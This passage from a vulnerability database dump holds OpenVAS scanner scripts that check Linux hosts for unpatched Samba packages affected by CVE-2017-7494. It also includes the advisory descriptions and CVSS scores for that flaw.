isrpmvuln(pkg:\"samba-doc\", rpm:\"samba-doc~3.6.23~43.el6_9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-domainjoin-gui\", rpm:\"samba-domainjoin-gui~3.6.23~43.el6_9\", 
rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-swat\", rpm:\"samba-swat~3.6.23~43.el6_9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind\", rpm:\"samba-winbind~3.6.23~43.el6_9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind-clients\", rpm:\"samba-winbind-clients~3.6.23~43.el6_9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind-devel\", rpm:\"samba-winbind-devel~3.6.23~43.el6_9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind-krb5-locator\", rpm:\"samba-winbind-krb5-locator~3.6.23~43.el6_9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-glusterfs\", rpm:\"samba-glusterfs~3.6.23~43.el6_9\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:13", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7494"], "description": "The remote host is missing an update for the 'samba' package(s) announced via the referenced advisory.", "modified": "2018-11-23T00:00:00", "published": "2017-05-25T00:00:00", "id": "OPENVAS:1361412562310871821", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871821", "type": "openvas", "title": "RedHat Update for samba RHSA-2017:1270-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for samba RHSA-2017:1270-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it 
and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871821\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-05-25 06:49:34 +0200 (Thu, 25 May 2017)\");\n script_cve_id(\"CVE-2017-7494\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"RedHat Update for samba RHSA-2017:1270-01\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'samba'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Samba is an open-source implementation of\nthe Server Message Block (SMB) protocol and the related Common Internet File\nSystem (CIFS) protocol, which allow PC-compatible machines to share files,\nprinters, and various information.\n\nSecurity Fix(es):\n\n * A remote code execution flaw was found in Samba. 
A malicious\nauthenticated samba client, having write access to the samba share, could\nuse this flaw to execute arbitrary code as root. (CVE-2017-7494)\n\nRed Hat would like to thank the Samba project for reporting this issue.\nUpstream acknowledges steelo as the original reporter.\");\n script_tag(name:\"affected\", value:\"samba on\n Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Server (v. 7),\n Red Hat Enterprise Linux Workstation (v. 6)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"RHSA\", value:\"2017:1270-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2017-May/msg00034.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_(7|6)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_7\")\n{\n\n if ((res = isrpmvuln(pkg:\"samba-common\", rpm:\"samba-common~4.4.4~14.el7_3\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsmbclient\", rpm:\"libsmbclient~4.4.4~14.el7_3\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libwbclient\", rpm:\"libwbclient~4.4.4~14.el7_3\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba\", rpm:\"samba~4.4.4~14.el7_3\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client\", 
rpm:\"samba-client~4.4.4~14.el7_3\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client-libs\", rpm:\"samba-client-libs~4.4.4~14.el7_3\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-common-libs\", rpm:\"samba-common-libs~4.4.4~14.el7_3\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-common-tools\", rpm:\"samba-common-tools~4.4.4~14.el7_3\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-debuginfo\", rpm:\"samba-debuginfo~4.4.4~14.el7_3\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-krb5-printing\", rpm:\"samba-krb5-printing~4.4.4~14.el7_3\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-libs\", rpm:\"samba-libs~4.4.4~14.el7_3\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-python\", rpm:\"samba-python~4.4.4~14.el7_3\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind\", rpm:\"samba-winbind~4.4.4~14.el7_3\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind-clients\", rpm:\"samba-winbind-clients~4.4.4~14.el7_3\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind-modules\", rpm:\"samba-winbind-modules~4.4.4~14.el7_3\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"libsmbclient\", rpm:\"libsmbclient~3.6.23~43.el6_9\", rls:\"RHENT_6\")) != NULL)\n {\n 
security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba\", rpm:\"samba~3.6.23~43.el6_9\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-client\", rpm:\"samba-client~3.6.23~43.el6_9\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-common\", rpm:\"samba-common~3.6.23~43.el6_9\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-debuginfo\", rpm:\"samba-debuginfo~3.6.23~43.el6_9\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind\", rpm:\"samba-winbind~3.6.23~43.el6_9\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba-winbind-clients\", rpm:\"samba-winbind-clients~3.6.23~43.el6_9\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:08", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7494"], "description": "The remote host is missing an update for the 'samba' package(s) announced via the referenced advisory.", "modified": "2019-03-15T00:00:00", "published": "2017-05-27T00:00:00", "id": "OPENVAS:1361412562310872719", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310872719", "type": "openvas", "title": "Fedora Update for samba FEDORA-2017-642a0eca75", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for samba FEDORA-2017-642a0eca75\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 
2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.872719\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-05-27 07:02:27 +0200 (Sat, 27 May 2017)\");\n script_cve_id(\"CVE-2017-7494\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for samba FEDORA-2017-642a0eca75\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'samba'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"samba on Fedora 25\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-642a0eca75\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/OQBWJCQH74QID2Q4N44FYXHLGE6RU32S\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks 
GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC25\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC25\")\n{\n\n if ((res = isrpmvuln(pkg:\"samba\", rpm:\"samba~4.5.10~0.fc25\", rls:\"FC25\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:38", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7494"], "description": "steelo discovered a remote code execution vulnerability in Samba, a\nSMB/CIFS file, print, and login server for Unix. A malicious client with\naccess to a writable share, can take advantage of this flaw by uploading\na shared library and then cause the server to load and execute it.", "modified": "2019-03-18T00:00:00", "published": "2017-05-24T00:00:00", "id": "OPENVAS:1361412562310703860", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703860", "type": "openvas", "title": "Debian Security Advisory DSA 3860-1 (samba - security update)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3860.nasl 14280 2019-03-18 14:50:45Z cfischer $\n# Auto-generated from advisory DSA 3860-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later 
version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703860\");\n script_version(\"$Revision: 14280 $\");\n script_cve_id(\"CVE-2017-7494\");\n script_name(\"Debian Security Advisory DSA 3860-1 (samba - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:50:45 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-05-24 00:00:00 +0200 (Wed, 24 May 2017)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2017/dsa-3860.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2017 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n script_tag(name:\"affected\", value:\"samba on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (jessie), this problem has been fixed in\nversion 2:4.2.14+dfsg-0+deb8u6.\n\nWe recommend that you upgrade your samba packages.\");\n script_tag(name:\"summary\", value:\"steelo discovered a remote code execution vulnerability in Samba, a\nSMB/CIFS file, print, and login server for Unix. 
A malicious client with\naccess to a writable share, can take advantage of this flaw by uploading\na shared library and then cause the server to load and execute it.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"ctdb\", ver:\"2:4.2.14+dfsg-0+deb8u6\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libnss-winbind\", ver:\"2:4.2.14+dfsg-0+deb8u6\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libpam-smbpass\", ver:\"2:4.2.14+dfsg-0+deb8u6\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libpam-winbind\", ver:\"2:4.2.14+dfsg-0+deb8u6\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libparse-pidl-perl\", ver:\"2:4.2.14+dfsg-0+deb8u6\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libsmbclient\", ver:\"2:4.2.14+dfsg-0+deb8u6\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libsmbclient-dev\", ver:\"2:4.2.14+dfsg-0+deb8u6\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libsmbsharemodes-dev\", ver:\"2:4.2.14+dfsg-0+deb8u6\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libsmbsharemodes0\", ver:\"2:4.2.14+dfsg-0+deb8u6\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libwbclient-dev\", ver:\"2:4.2.14+dfsg-0+deb8u6\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libwbclient0\", ver:\"2:4.2.14+dfsg-0+deb8u6\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"python-samba\", ver:\"2:4.2.14+dfsg-0+deb8u6\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"registry-tools\", ver:\"2:4.2.14+dfsg-0+deb8u6\", rls:\"DEB8\")) != NULL) 
{\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"samba\", ver:\"2:4.2.14+dfsg-0+deb8u6\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"samba-common\", ver:\"2:4.2.14+dfsg-0+deb8u6\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"samba-common-bin\", ver:\"2:4.2.14+dfsg-0+deb8u6\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"samba-dbg\", ver:\"2:4.2.14+dfsg-0+deb8u6\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"samba-dev\", ver:\"2:4.2.14+dfsg-0+deb8u6\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"samba-doc\", ver:\"2:4.2.14+dfsg-0+deb8u6\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"samba-dsdb-modules\", ver:\"2:4.2.14+dfsg-0+deb8u6\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"samba-libs\", ver:\"2:4.2.14+dfsg-0+deb8u6\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"samba-testsuite\", ver:\"2:4.2.14+dfsg-0+deb8u6\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"samba-vfs-modules\", ver:\"2:4.2.14+dfsg-0+deb8u6\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"smbclient\", ver:\"2:4.2.14+dfsg-0+deb8u6\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"winbind\", ver:\"2:4.2.14+dfsg-0+deb8u6\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:27", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7494"], "description": "The remote host is missing an update for the 'samba4' package(s) announced via the referenced advisory.", "modified": "2018-11-23T00:00:00", "published": "2017-05-25T00:00:00", "id": "OPENVAS:1361412562310871822", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871822", "type": 
"openvas", "title": "RedHat Update for samba4 RHSA-2017:1271-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for samba4 RHSA-2017:1271-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871822\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-05-25 06:49:39 +0200 (Thu, 25 May 2017)\");\n script_cve_id(\"CVE-2017-7494\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"RedHat Update for samba4 RHSA-2017:1271-01\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'samba4'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n 
script_tag(name:\"insight\", value:\"Samba is an open-source implementation of\nthe Server Message Block (SMB) or Common Internet File System (CIFS) protocol,\nwhich allows PC-compatible machines to share files, printers, and other\ninformation.\n\nSecurity Fix(es):\n\n * A remote code execution flaw was found in Samba. A malicious\nauthenticated samba client, having write access to the samba share, could\nuse this flaw to execute arbitrary code as root. (CVE-2017-7494)\n\nRed Hat would like to thank the Samba project for reporting this issue.\nUpstream acknowledges steelo as the original reporter.\");\n script_tag(name:\"affected\", value:\"samba4 on\n Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Workstation (v. 6)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"RHSA\", value:\"2017:1271-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2017-May/msg00035.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_6\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"samba4\", rpm:\"samba4~4.2.10~10.el6_9\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-client\", rpm:\"samba4-client~4.2.10~10.el6_9\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-common\", rpm:\"samba4-common~4.2.10~10.el6_9\", 
rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-dc\", rpm:\"samba4-dc~4.2.10~10.el6_9\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-dc-libs\", rpm:\"samba4-dc-libs~4.2.10~10.el6_9\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-debuginfo\", rpm:\"samba4-debuginfo~4.2.10~10.el6_9\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-devel\", rpm:\"samba4-devel~4.2.10~10.el6_9\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-libs\", rpm:\"samba4-libs~4.2.10~10.el6_9\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-pidl\", rpm:\"samba4-pidl~4.2.10~10.el6_9\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-python\", rpm:\"samba4-python~4.2.10~10.el6_9\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-test\", rpm:\"samba4-test~4.2.10~10.el6_9\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-winbind\", rpm:\"samba4-winbind~4.2.10~10.el6_9\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-winbind-clients\", rpm:\"samba4-winbind-clients~4.2.10~10.el6_9\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-winbind-krb5-locator\", rpm:\"samba4-winbind-krb5-locator~4.2.10~10.el6_9\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": 
"AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T18:28:25", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7494"], "description": "The remote host is missing an update for the 'samba' package(s) announced via the referenced advisory.", "modified": "2020-01-31T00:00:00", "published": "2017-05-27T00:00:00", "id": "OPENVAS:1361412562310851559", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851559", "type": "openvas", "title": "openSUSE: Security Advisory for samba (openSUSE-SU-2017:1415-1)", "sourceData": "# Copyright (C) 2017 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851559\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-05-27 06:53:04 +0200 (Sat, 27 May 2017)\");\n script_cve_id(\"CVE-2017-7494\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for samba (openSUSE-SU-2017:1415-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'samba'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for samba fixes the 